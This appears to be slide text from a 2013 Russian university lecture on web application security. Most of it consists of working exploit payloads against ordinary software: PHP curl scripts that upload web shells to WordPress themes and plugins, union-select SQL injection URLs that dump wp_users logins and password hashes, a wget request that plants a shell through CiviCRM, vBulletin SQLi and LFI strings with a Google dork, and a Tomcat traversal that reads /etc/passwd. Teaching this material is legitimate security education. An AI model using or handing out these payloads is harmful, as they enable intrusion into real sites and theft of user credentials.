More Related Content Similar to Безопасность интернет-приложений осень 2013 лекция 10 (13) More from Technopark (20) 4. var a = (0x11223344^0x44332211^0x44332211^ ...);
0: b8 44 33 22 11
5: 35 11 22 33 44
a: 35 11 22 33 44
1:
2:
4:
a:
mov $0x11223344,%eax
xor $0x44332211,%eax
xor $0x44332211,%eax
44
inc %esp
33 22
xor (%edx),%esp
11 35 11 22 33 44 adc %esi,0x44332211
35 11 22 33 44
xor $0x44332211,%eax
4
6. Wordpress checks
admin location
/wp-admin/
admin user
admin
plugins
/wp-content/plugins
themes
/wp-content/themes
scanner
nmap http-wordpress-plugins
nmap --script=http-wordpress-plugins --script-args
http-wordpress-plugins.root="/blog/" <target>
6
7. Exploit: suco theme file upload
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
shell: http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
7
8. Exploit: wp-realty blind sql
http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?
action=contact_friend&popup=yes&listing_id=[SQLi]
8
9. Exploit: Complete Gallery Manager 3.3.3 file upload
<?php
$uploadfile="up.php";
$ch = curl_init("
http://target/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
9
10. Exploit: All Video Gallery 1.1 sqli
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
10
12. Exploit: redSHOP component sqli
http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22
%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%
20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,
45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
12
13. Exploit: com_civicrm component remote code execution
wget –post-data "<?php phpinfo(); ?>"
http://target/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofclibrary/ofc_upload_image.php?name=shell.php
13
15. Exploit: Yet Another Award sqli
Google dork: inurl:awards.php intext:"powered by vbulletin"
$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));
$award_request_uid = $vbulletin->GPC['award_request_uid'];
$db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid,
award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db>escape_string($vbulletin->GPC['award_request_reason']) ."')");
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&
award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
15
16. Exploit: vBulletin 4.1.10 LFI
http://target/Patch/includes/functions_cron.php?nextitem=[Lfi]
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&
award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
16
18. Exploit: tomcat < 6.0.18 utf8 directory traversal
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
18
19. 5 апреля 2010
jira issue: http://tinyurl.com/XXXXXXXXX
XSS
получение административного доступа в jira
backdoor
19
